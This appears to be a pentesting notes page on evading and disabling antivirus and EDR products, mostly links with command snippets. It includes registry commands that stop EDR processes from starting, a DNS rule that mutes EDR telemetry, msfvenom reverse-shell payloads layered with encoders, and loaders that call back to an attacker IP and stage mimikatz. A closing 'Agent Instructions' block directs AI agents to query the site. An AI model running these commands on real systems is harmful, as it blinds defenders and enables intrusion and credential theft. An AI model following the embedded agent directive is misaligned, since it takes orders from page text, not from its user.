# AV / EDR Evasion

* <https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/>
* <https://codeby.net/threads/meterpreter-snova-v-dele-100-fud-with-metasploit-5.66730/>
* <https://github.com/phackt/stager.dll>
* <https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad>
* <https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8>
* <https://xakep.ru/2020/12/23/shikata-ga-nai/>
* <https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f>
* <https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/>
* <https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/>
* <https://blog.sunggwanchoi.com/creating-a-loader-poc-using-various-languages/>
* <https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/>
* <https://xakep.ru/2021/07/23/detection-bypassing/>
* <https://zen.yandex.ru/media/id/5d4f02da027a1500ad43866f/obhodim-antivirusy-kriptor-net-prilojenii-5fc6a199a8f33a1036140386>
* <https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity.html>

![BypassAV Mindmap](https://raw.githubusercontent.com/CMEPW/BypassAV/main/img/Bypass-AV.png)

## Toy EDRs

* <https://xacone.github.io/BestEdrOfTheMarket.html>
* <https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/>
* <https://github.com/Helixo32/CrimsonEDR>
* <https://github.com/0xflux/Sanctum>

## Recon

* <https://github.com/ethereal-vx/Antivirus-Artifacts>
* <https://github.com/Mr-Un1k0d3r/EDRs>

Search for active AV processes on hosts (local admin priveleges required):

```
Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}
```

Identify Microsoft.NET version from inspecting assembly properties:

```
PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion
```

Identify Microsoft.NET version from querying the registry:

```
PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release
```

Windows build <-> default .NET Framework version associations:

| Windows Build | Default .NET Framework Version |
| ------------- | ------------------------------ |
| 1511          | 4.6.1                          |
| 1607          | 4.6.2                          |
| 1703          | 4.7                            |
| 1709          | 4.7.1                          |
| 1803          | 4.7.2                          |
| 1909+         | 4.8                            |

.NET Framework version <-> CLR version associations:

| .NET Framework Version | CLR Version |
| ---------------------- | ----------- |
| 2.0, 3.0, 3.5          | 2           |
| 4, 4.5-4.8             | 4           |

{% hint style="info" %}
Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the above relationship between .NET Framework version and CLR version, i. e. all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.
{% endhint %}

Potential scan exclusions:

* `C:\Windows\System32\LogFiles\`
* `C:\Windows\System32\inetsrv\`
* `C:\Windows\ClusterStorage\`
* `C:\ProgramData\Microsoft\Windows\Hyper-V\`

## Attacking EDRs

* <https://mansk1es.gitbook.io/edr-binary-abuse/>
* <https://xss.is/threads/67718/>
* <https://www.safebreach.com/blog/dark-side-of-edr-offensive-tool/>
* <https://www.alteredsecurity.com/post/when-the-hunter-becomes-the-hunted-using-custom-callbacks-to-disable-edrs>
* <https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/>
* <https://github.com/arosenmund/defcon33_silence_kill_edr>

**Hard-style** launch prevention using [IFEO](https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/image-file-execution-options):

```
Cmd > reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<EDR_IMAGE.exe>" /t REG_SZ /v Debugger /d "C:\Windows\System32\rundll32.exe" /f
```

**Hard-style** launch prevention using [BootExecute](https://github.com/rad9800/BootExecuteEDR):

```
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecute" /t REG_MULTI_SZ /d "autocheck autochk *\0BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecuteNoPnpSync" /t REG_MULTI_SZ /d "BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "SetupExecute" /t REG_MULTI_SZ /d "BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PlatformExecute" /t REG_MULTI_SZ /d "BEB" /f
```

**Hard-style** launch prevention using PPL process start:

* <https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html>
* <https://github.com/2x7EQ13/CreateProcessAsPPL>

### WFP-Based Prisons

* <https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/>

#### EDRSilencer

* <https://github.com/netero1010/EDRSilencer/tree/main>

#### EDRPrison

* <https://www.3nailsinfosec.com/post/edrprison-borrow-a-legitimate-driver-to-mute-edr-agent>
* <https://github.com/senzee1984/EDRPrison>

#### WinDivert

* <https://reqrypt.org/windivert-doc.html>
* <https://github.com/basil00/Divert/wiki/WinDivert-Documentation>

**.NET:**

* <https://github.com/TechnikEmpire/WinDivertSharp>
* <https://github.com/xljiulang/WindivertDotnet>

**Python:**

* <https://github.com/ffalcinelli/pydivert>
* <https://github.com/shuxin/pydivert>
* <https://github.com/xshiraori/PyDivert2>

### ARP Spoofing + Scapy

* <https://tierzerosecurity.co.nz/2024/07/23/edr-telemetry-blocker.html>
* <https://github.com/TierZeroSecurity/edr_blocker>

### Name Resolution Policy Table

* <https://cloudbrothers.info/en/edr-silencers-exploring-methods-block-edr-communication-part-1/>

Add rule:

```
PS > Add-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" -NameServers 127.0.0.1 -Comment "MegaCorp EDR Web Panel"
PS > Clear-DnsClientCache -Confirm:$false
```

Remove rule:

```
PS > Get-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" | Remove-DnsClientNrptRule -PassThru -Confirm:$false -Force
```

## EDR Blindspots

### Bring Your Own Interpreter (BYOI)

* <https://synzack.github.io/Bring-Your-Own-Interpreter/>

#### Python

* <https://github.com/hakril/PythonForWindows>
* <https://trustedsec.com/blog/operating-inside-the-interpreted-offensive-python>
* <https://github.com/Teach2Breach/rpeloader>

**Pyramid**

* <https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html>
* <https://github.com/naksyn/Pyramid>
* <https://github.com/naksyn/Embedder>
* <https://gist.github.com/snovvcrash/39263ccae8e07210c3f87c9472b4c908>

**BOFs with Python**

* <https://github.com/rkbennett/pybof>
* <https://tishina.in/execution/python-inmemory-bof>
* <https://github.com/zimnyaa/inmembof.py>
* <https://github.com/ELMERIKH/PyinMemoryPE>

**Python RDI**

* <https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter/source/extensions/python>
* <https://github.com/n1nj4sec/pupy/tree/unstable/client/sources>

### Backdoor Electron Applications (JavaScript)

* <https://www.ibm.com/think/x-force/bypassing-windows-defender-application-control-loki-c2>
* <https://github.com/boku7/Loki>

## PE Obfuscation

* <https://blog.es3n1n.eu/posts/obfuscator-pt-1>

### OLLVM

* <https://0xpat.github.io/Malware_development_part_6/>
* <https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec>
* <https://github.com/icyguider/Shhhloader>
* <https://hub.docker.com/repository/docker/snovvcrash/ollvm13>
* <https://github.com/jonpalmisc/limoncello>
* <https://github.com/janoglezcampos/llvm-yx-callobfuscator>

Install LLVM 13.x obfuscator based on [heroims/obfuscator](https://github.com/heroims/obfuscator) and [tpoechtrager/wclang](https://github.com/tpoechtrager/wclang):

```bash
apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build
```

### TinyCC

* <https://bellard.org/tcc/>
* <https://github.com/DosX-dev/obfus.h>

```
PS > curl https://download.savannah.gnu.org/releases/tinycc/tcc-0.9.27-win64-bin.zip -o tcc.zip
PS > Expand-Archive .\tcc.zip -DestinationPath .
PS > rm tcc.zip; cd tcc
PS > curl https://github.com/DosX-dev/obfus.h/raw/refs/heads/main/include/obfus.h -o obfus.h
PS > curl https://download.savannah.gnu.org/releases/tinycc/winapi-full-for-0.9.27.zip -o tcc-winapi.zip
PS > Expand-Archive .\tcc-winapi.zip -DestinationPath .
PS > rm tcc-winapi.zip
PS > Copy-Item -Path .\winapi-full-for-0.9.27\include\* -Destination .\include\ -Recurse -Force
PS > .\tcc.exe -w -DVIRT -DCFLOW_V2 -DANTIDEBUG_V2 -o msgbox.exe msgbox.c -luser32
```

### String Encryption

* <https://gist.github.com/EvanMcBroom/ad683e394f84b623da63c2b95f6fb547>
* <https://github.com/skadro-official/skCrypter>
* <https://github.com/trustedsec/The_Shelf/blob/main/POC/impacketremoteshell/RemoteMaint/stringobf.h>
* <https://github.com/Evi1Grey5/Bypass-Smartscreen-/blob/main/obfuscate.h>

### Tools

* <https://github.com/mike1k/perses>
* <https://github.com/weak1337/Alcatraz>
* <https://github.com/es3n1n/obfuscator>
* <https://github.com/d35ha/CallObfuscator>
* <https://github.com/ac3ss0r/obfusheader.h>
* <https://github.com/EgeBalci/deoptimizer>
* <https://github.com/DosX-dev/Astral-PE>
* <https://github.com/x86byte/Obfusk8>

## Shellcode Mutation

* <https://g3tsyst3m.com/shellcode/pic/Let's-Create-Some-Polymorphic-PIC-Shellcode!/>

### Tools

* <https://medium.com/@0x0vid/same-same-but-different-a-dive-into-keyless-polymorphism-7570c1def3e2>
* <https://github.com/codewhitesec/Lastenzug/tree/main/LastenPIC/SpiderPIC>
* <https://github.com/tijme/dittobytes>
* <https://github.com/gum3t/chameleon>

## PowerShell Tactics

* <https://github.com/specterops/at-ps>
* <https://telegra.ph/Komandy-PowerShell-dlya-pentesterov-03-01>

### PowerShell Obfuscation

* <https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation>
* <https://github.com/t3l3machus/PowerShell-Obfuscation-Bible>
* <https://github.com/tokyoneon/Chimera>
* <https://github.com/klezVirus/chameleon>
* <https://github.com/AdrianVollmer/PowerHub>

#### Invoke-Obfuscation

* <https://github.com/danielbohannon/Invoke-Obfuscation>
* <https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide>

#### Out-EncryptedScript.ps1

* <https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-EncryptedScript.ps1>
* <https://powersploit.readthedocs.io/en/latest/ScriptModification/Out-EncryptedScript/>

```
PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec
```

#### PowerShellArmoury

* <https://github.com/cfalta/PowerShellArmoury>
* <https://cyberstoph.org/posts/2019/12/evading-anti-virus-with-powershell-armoury/>
* <https://cyberstoph.org/posts/2020/02/psarmoury-1.4-now-with-even-more-armour/>

```
PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex
```

## Tools

### msfvenom

```
$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe
```

### Veil-Evasion

Hyperion + Pescramble

```
$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe
```

### GreatSCT

* <https://github.com/GreatSCT/GreatSCT>

{% embed url="<https://youtu.be/krC5j1Ab44I?t=3730>" %}

Install and generate a payload:

```
$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}

$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
```

Exec with `msbuild.exe` and get a shell:

```
PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml
```

### Ebowla

```
$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
... Edit output_type, payload_type, clean_output, [[ENV_VAR]] ...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe
```

### PEzor

* <https://github.com/phra/PEzor>

Wrap executable into PEzor:

```
$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2
```

### inceptor

* <https://klezvirus.github.io/RedTeaming/AV_Evasion/CodeExeNewDotNet/>
* <https://github.com/klezVirus/inceptor>

### ScareCrow

* <https://github.com/optiv/ScareCrow>
* <https://www.grahamhelton.com/blog/scarecrow/>
* <https://adamsvoboda.net/evading-edr-with-scarecrow/>

### charlotte

* <https://github.com/9emin1/charlotte>
* <https://github.com/cepxeo/dll4shell>

```
$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>
```

### MeterPwrShell

* <https://github.com/GetRektBoy724/MeterPwrShell/releases>
* <https://raikia.com/tool-powershell-encoder/>

```
$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate
```

### stager\_libpeconv

* <https://github.com/tothi/stager_libpeconv>
* <https://github.com/hasherezade/libpeconv>

```
$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/av-edr-evasion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.